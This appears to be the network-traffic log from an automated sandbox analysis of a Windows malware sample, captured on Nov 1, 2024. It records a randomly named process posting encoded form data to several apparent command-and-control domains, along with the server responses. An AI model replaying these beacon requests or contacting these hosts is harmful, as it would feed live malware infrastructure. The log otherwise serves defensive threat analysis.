NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8dbe08b8ce1dddb3-DFW
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1112&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=730&delivery_rate=0&cwnd=71&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49853 | 188.114.96.3 | 80 | 4340 | C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 19:44:06.658864021 CET | 10812 | OUT | POST /o91n/ HTTP/1.1
Host: www.vrxlzluy.shop
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Content-Length: 10304
Content-Type: application/x-www-form-urlencoded
Origin: http://www.vrxlzluy.shop
Referer: http://www.vrxlzluy.shop/o91n/
User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Data Ascii: XbDhGVR= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49864 | 188.114.96.3 | 80 | 4340 | C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 19:44:09.216675997 CET | 448 | OUT | GET /o91n/?XbDhGVR=Thp61v6sOdtIOU1AhqZOcShyli3Q2Rus+09XFbP+3c72g6WMTcCeHGHsKE18csM01zHbC+82zyOO8bx37pnUbuImGHRIRsUOfuHIGVgprfqSQRJiadd1v3E=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1
Host: www.vrxlzluy.shop
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-us
Connection: close
User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Nov 1, 2024 19:44:10.733464003 CET | 1236 | IN | HTTP/1.1 301 Moved Permanently
Date: Fri, 01 Nov 2024 18:44:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
x-redirect-by: WordPress
location: https://vrxlzluy.shop/o91n/?XbDhGVR=Thp61v6sOdtIOU1AhqZOcShyli3Q2Rus+09XFbP+3c72g6WMTcCeHGHsKE18csM01zHbC+82zyOO8bx37pnUbuImGHRIRsUOfuHIGVgprfqSQRJiadd1v3E=&Qz=BJvp0BdhxXiTCTGP
x-litespeed-cache-control: public,max-age=3600
x-litespeed-tag: 59f_HTTP.404,59f_HTTP.301,59f_404,59f_URL.5d76aa37dbc043a4dec01f7366a41e31,59f_
x-litespeed-cache: miss
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sXVuBWOYZybZFlUBJFO8S%2FMR%2FImUCROoaqM%2FMPs3uT%2BKt3ddcs60I9vVg84Yp7qOc6CglJaF5KDTSyFohhCQ5dplYI0L6rcaJ8%2Fa7G4WNmq9h51%2BvxVf1fiq5GGdvV2%2Ff%2BVk2A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8dbe08d91e8c2d2f-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1438&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=448&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=00000
Nov 1, 2024 19:44:10.733572960 CET | 29 | IN | Data Ascii: 0000000000&ts=0&x=0"0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49900 | 3.33.130.190 | 80 | 4340 | C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 19:44:15.789380074 CET | 716 | OUT | POST /3c6w/ HTTP/1.1
Host: www.trifecta.center
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Origin: http://www.trifecta.center
Referer: http://www.trifecta.center/3c6w/
User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Data Ascii: XbDhGVR=ILUXf4KRS20ZAHxkx0D9XIxySUFcRWHAJvzG5bmQoRzZKwf4Wr8JXnjTt7OGOs0AAMbjPgCgxCUrGKps6VbcgtV1j0tNEDY6QSvgIGA0BL2U10p5+J5029i5FoBlJ5vnTHVeOnL1LK8VJXEnQ6tGZjATWOlyXlFsBvdj+jfvl3BQp+Jh071mC541rLMJwF+0ng==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49916 | 3.33.130.190 | 80 | 4340 | C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 19:44:18.329583883 CET | 736 | OUT | POST /3c6w/ HTTP/1.1
Host: www.trifecta.center
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Content-Length: 224
Content-Type: application/x-www-form-urlencoded
Origin: http://www.trifecta.center
Referer: http://www.trifecta.center/3c6w/
User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Data Ascii: XbDhGVR=ILUXf4KRS20ZBnhk83r9DYxxOkFcb2HMJuPG5aSApjHZKUP4XuQJUnjT5rODTc1MAMXRPimgxD0rGLZs6kbb6dVroUtLbTY6QSvgIG8SBLuU1EZ59o5zqti6CoBlN5vjTHULOmWeLIEVJW0nQoJFXjAVLekkXW0zYqQe+D3MrUZjlYE7lKUxQ5cG2MF99GD98oEDf0FuokIg4D+8vCt7zZc=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49932 | 3.33.130.190 | 80 | 4340 | C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 19:44:20.879575014 CET | 10818 | OUT | POST /3c6w/ HTTP/1.1
Host: www.trifecta.center
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Content-Length: 10304
Content-Type: application/x-www-form-urlencoded
Origin: http://www.trifecta.center
Referer: http://www.trifecta.center/3c6w/
User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Data Ascii: XbDhGVR= [TRUNCATED]


                                                                                         Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49946 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 4340 | Process: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                         Timestamp: Nov 1, 2024 19:44:23.425488949 CET | Bytes transferred: 450 | Direction: OUT
                                                                                         GET /3c6w/?XbDhGVR=FJ83cOvFWEccIB8Y6SCsBqJgMlFSJUXICv/nsL67hA7PUBbPcYUeOgrdyaqmH9Z1A+LVMRCMzG0eJtFhxlj35v5UnzdVcRI8ETGcI3l1N4u34k5Wtd8PhNs=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1
                                                                                        Host: www.trifecta.center
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-us
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                         Timestamp: Nov 1, 2024 19:44:24.051904917 CET | Bytes transferred: 403 | Direction: IN
                                                                                         HTTP/1.1 200 OK
                                                                                        Server: openresty
                                                                                        Date: Fri, 01 Nov 2024 18:44:23 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 263
                                                                                        Connection: close
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?XbDhGVR=FJ83cOvFWEccIB8Y6SCsBqJgMlFSJUXICv/nsL67hA7PUBbPcYUeOgrdyaqmH9Z1A+LVMRCMzG0eJtFhxlj35v5UnzdVcRI8ETGcI3l1N4u34k5Wtd8PhNs=&Qz=BJvp0BdhxXiTCTGP"}</script></head></html>


                                                                                         Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49981 | Destination IP: 154.23.184.95 | Destination Port: 80 | PID: 4340 | Process: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                         Timestamp: Nov 1, 2024 19:44:29.501153946 CET | Bytes transferred: 698 | Direction: OUT
                                                                                         POST /rj0s/ HTTP/1.1
                                                                                        Host: www.wcp95.top
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 204
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.wcp95.top
                                                                                        Referer: http://www.wcp95.top/rj0s/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Ascii: XbDhGVR=9y3LqfndcrGE1wQUrzEDpdI2KdmWN2Zs6rc70CV/6W3/QhERZy5xK8K0/PcQ1yLtc9bpIfHhupbVFtFGbOkz1dezrKuCHL14/LYxGQWaU2Xf9hZIS7CgaHkEE7hk8eJYptzzJmSjKSf4cAMiNv1NND7evycuxjyAiQrcUGONoGi113fbDuWqw55WdlvvFK0WrQ==
                                                                                         Timestamp: Nov 1, 2024 19:44:30.496536016 CET | Bytes transferred: 312 | Direction: IN
                                                                                         HTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Fri, 01 Nov 2024 18:44:30 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 148
                                                                                        Connection: close
                                                                                        ETag: "66a747c1-94"
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                         Session ID: 10 | Source IP: 192.168.2.4 | Source Port: 49996 | Destination IP: 154.23.184.95 | Destination Port: 80 | PID: 4340 | Process: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                         Timestamp: Nov 1, 2024 19:44:32.050538063 CET | Bytes transferred: 718 | Direction: OUT
                                                                                         POST /rj0s/ HTTP/1.1
                                                                                        Host: www.wcp95.top
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 224
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.wcp95.top
                                                                                        Referer: http://www.wcp95.top/rj0s/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Ascii: XbDhGVR=9y3LqfndcrGE1TIUpUwDhdIxG9mWEWZo6rQ70A467jn/QA0RawdxL8K0wvdY4SLic9HbIe7hupfVFpBGb5Iy1Ne1yauAKr14/LYxGQSkU3/f6SRITf2hZHl2UrhkuuITptzdJj6aKQ34cA8iDe1KHD7Yyida3DyJmDaob1OSnmSZwxSBSf39i5dlAimbIJJfwQ4vdmMq/0NiWVTq3WZaomE=
                                                                                         Timestamp: Nov 1, 2024 19:44:33.057655096 CET | Bytes transferred: 312 | Direction: IN
                                                                                         HTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Fri, 01 Nov 2024 18:44:32 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 148
                                                                                        Connection: close
                                                                                        ETag: "66a747c1-94"
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                         Session ID: 11 | Source IP: 192.168.2.4 | Source Port: 50011 | Destination IP: 154.23.184.95 | Destination Port: 80 | PID: 4340 | Process: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                         Timestamp: Nov 1, 2024 19:44:34.597165108 CET | Bytes transferred: 10800 | Direction: OUT
                                                                                         POST /rj0s/ HTTP/1.1
                                                                                        Host: www.wcp95.top
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 10304
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.wcp95.top
                                                                                        Referer: http://www.wcp95.top/rj0s/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                         Timestamp: Nov 1, 2024 19:44:35.562186003 CET | Bytes transferred: 312 | Direction: IN
                                                                                         HTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Fri, 01 Nov 2024 18:44:35 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 148
                                                                                        Connection: close
                                                                                        ETag: "66a747c1-94"
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                         Session ID: 12 | Source IP: 192.168.2.4 | Source Port: 50015 | Destination IP: 154.23.184.95 | Destination Port: 80 | PID: 4340 | Process: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                         Timestamp: Nov 1, 2024 19:44:37.140327930 CET | Bytes transferred: 444 | Direction: OUT
                                                                                         GET /rj0s/?XbDhGVR=wwfrpq2GStq8yXhruzchqPI2DPKMclx/34kF3CMx+1v+TSw3PCRza/Sx++Q9wxTideP8HMqKtaf0MdZtX7Zp7/WG/Y2BEJVTn7MuHEHfS2P/6TB7VaKsbng=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1
                                                                                        Host: www.wcp95.top
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-us
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                         Timestamp: Nov 1, 2024 19:44:38.138628006 CET | Bytes transferred: 312 | Direction: IN
                                                                                         HTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Fri, 01 Nov 2024 18:44:37 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 148
                                                                                        Connection: close
                                                                                        ETag: "66a747c1-94"
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                         Session ID: 13 | Source IP: 192.168.2.4 | Source Port: 50016 | Destination IP: 172.67.185.22 | Destination Port: 80 | PID: 4340 | Process: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                         Timestamp: Nov 1, 2024 19:44:43.383128881 CET | Bytes transferred: 722 | Direction: OUT
                                                                                         POST /xh7d/ HTTP/1.1
                                                                                        Host: www.gokulmohan.online
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 204
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.gokulmohan.online
                                                                                        Referer: http://www.gokulmohan.online/xh7d/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Ascii: XbDhGVR=oZLX2YQvJ/hPbrtcnjqC+acW/EwpXhU76WFm8Vd87Lo2IIyP/6SmkwjAGaf+Md6WN/WBV8DORrKqXJfATcXQrl+6m9wGbOFjdkPBHn+tnb/KI5HJghIY8ofXsXVk5S4DhZFk5FTX5lfMj1ldVmbwIuAFoyrX+V4Syfyb+RlS4ej7oZNCEiBKqtxfgNsfrxoPbQ==
                                                                                         Timestamp: Nov 1, 2024 19:44:44.513079882 CET | Bytes transferred: 1236 | Direction: IN
                                                                                         HTTP/1.1 403 Forbidden
                                                                                        Date: Fri, 01 Nov 2024 18:44:44 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Referrer-Policy: same-origin
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VMc4kej3xsHWVHVyRtzgDEwL97kfIAilrzvQYdNJDZZESasPzZugSaO%2FW1kreJw82UqtBttv0aMYyYbyaw5kgP5nHL%2BT0sNXT7f53e%2FybG1c79frq5SR%2FLc0lR80DBlwlzmSyRsTPBQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbe09ae7a984796-DFW
                                                                                        Content-Encoding: gzip
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1243&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=722&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                         Data: (gzip-compressed binary response body, not shown)
                                                                                         Timestamp: Nov 1, 2024 19:44:44.513092995 CET | Bytes transferred: 1138 | Direction: IN
                                                                                         Data: (gzip-compressed binary response body, continued, not shown)


                                                                                         Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 50017 | Destination IP: 172.67.185.22 | Destination Port: 80 | PID: 4340 | Process: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                         Timestamp: Nov 1, 2024 19:44:45.926578999 CET | Bytes transferred: 742 | Direction: OUT
                                                                                         POST /xh7d/ HTTP/1.1
                                                                                        Host: www.gokulmohan.online
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 224
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.gokulmohan.online
                                                                                        Referer: http://www.gokulmohan.online/xh7d/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Ascii: XbDhGVR=oZLX2YQvJ/hPbL9clEeC46cVzkwpeBU/6WJm8Qts4+42It2Pl7Sm0gjAM6fxB96rN/aJV4DORo2qXNPATrrRr1+8rdwAfOFjdkPBHnqXnfTKJLTJiDsfjYfWpXVkzy4HhZFC5EP55nnMjxhdU3bxBuADmSqE22FY7+P9235H+dncg/AYVTgd4tVs9KlrmyVGAQTCNAh4kYJRcymcKMhjTZA=
                                                                                         Timestamp: Nov 1, 2024 19:44:47.090326071 CET | Bytes transferred: 1236 | Direction: IN
                                                                                         HTTP/1.1 403 Forbidden
                                                                                        Date: Fri, 01 Nov 2024 18:44:47 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Referrer-Policy: same-origin
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c54i1NTYfqhhNAuc1op9SZ4x6jqIffX33WfLc%2BtZeTnm6Mh%2FrZNgDDN4cJVdHJ5Hifnl7DP1Mz%2FvKAvgc5eSFDO0XMlhrEfvL2BMjv%2FM%2BfqfxVR11oJ2RXem6%2Bp1z16l6S7i42Mx4hQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbe09be9fc30bbb-DFW
                                                                                        Content-Encoding: gzip
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1316&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=742&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 35 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 56 5b 37 3f 98
                                                                                        Data Ascii: 58cVmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1V[7?
                                                                                        Nov 1, 2024 19:44:47.090347052 CET | 1142 | IN | Data Raw: cd f6 02 2c a5 5a c1 2d e4 d6 49 74 d3 dc 12 d9 66 7e d8 de 80 b7 5a 49 38 90 52 0e e6 f5 61 7f da 74 8d aa aa 69 6e ac 6b 84 1e d2 1a 9c 93 a7 d8 ec b8 f8 56 98 c1 cf ab 2f 38 3f 9a 3d da 82 39 3a 3a 3a fe 61 c8 e8 7e a0 4c 69 19 dd 4e 2e e5 11
                                                                                        Data Ascii: ,Z-Itf~ZI8RatinkV/8?=9:::a~LiN.[tn,y6|4m^)6}k=eYlMR<@*_L`N54f9,0%pd\OgO~ak'o/`""+(z[G(,mQ`;#*SC!


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        15 | 192.168.2.4 | 50018 | 172.67.185.22 | 80 | 4340 | C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 1, 2024 19:44:48.474070072 CET | 10824 | OUT | POST /xh7d/ HTTP/1.1
                                                                                        Host: www.gokulmohan.online
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 10304
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.gokulmohan.online
                                                                                        Referer: http://www.gokulmohan.online/xh7d/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 6f 5a 4c 58 32 59 51 76 4a 2f 68 50 62 4c 39 63 6c 45 65 43 34 36 63 56 7a 6b 77 70 65 42 55 2f 36 57 4a 6d 38 51 74 73 34 39 59 32 4a 62 4b 50 6d 59 36 6d 33 67 6a 41 53 71 66 79 42 39 36 36 4e 38 71 4e 56 34 50 65 52 75 79 71 47 66 48 41 59 36 72 52 6b 31 2b 38 33 74 77 46 62 4f 46 32 64 6b 65 4b 48 6e 36 58 6e 66 54 4b 4a 4b 6a 4a 6d 52 49 66 77 49 66 58 73 58 56 34 35 53 34 76 68 5a 4e 38 35 45 4c 48 2b 54 62 4d 6a 56 46 64 53 42 76 78 64 2b 41 42 68 53 72 44 32 32 4a 62 37 2f 6a 6d 32 33 6c 74 2b 61 76 63 6a 35 68 43 58 68 49 79 68 75 31 39 6d 74 39 58 75 69 74 58 49 6a 6e 6f 63 79 78 73 39 39 70 66 52 43 72 6f 65 66 78 56 4f 63 4e 55 4f 44 4b 72 56 4c 31 4f 4e 34 6a 61 6e 69 50 74 66 74 35 61 76 38 51 64 57 2b 4d 46 6b 6f 6e 73 65 78 6f 4b 62 4f 4e 41 57 71 5a 61 2b 65 36 63 4a 4e 34 6f 65 6b 6d 79 59 63 45 64 6d 37 35 61 6d 34 43 39 75 70 46 33 4f 43 6d 41 67 74 66 71 34 30 78 45 75 65 34 43 77 64 52 45 6a 74 39 6b 34 6a 69 73 46 58 4e 6f 65 44 2b 2f 78 44 33 71 45 34 [TRUNCATED]
                                                                                        Data Ascii: XbDhGVR=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 [TRUNCATED]
                                                                                        Nov 1, 2024 19:44:49.639130116 CET | 1236 | IN | HTTP/1.1 403 Forbidden
                                                                                        Date: Fri, 01 Nov 2024 18:44:49 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Referrer-Policy: same-origin
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
